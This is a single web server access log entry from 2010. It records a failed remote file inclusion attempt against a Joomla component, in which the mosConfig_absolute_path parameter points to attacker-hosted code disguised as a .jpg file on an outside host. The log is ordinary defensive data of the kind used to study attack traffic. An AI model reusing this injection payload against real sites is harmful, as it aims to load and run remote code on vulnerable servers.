216.108.237.12 - - [01/Mar/2010:05:26:02 -0800] "GET /logs/http://www.mielenz-ctg.de/components/com_koesubmit/koesubmit.php?mosConfig_absolute_path=http://rombusz.com/wp-admin/css/color.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
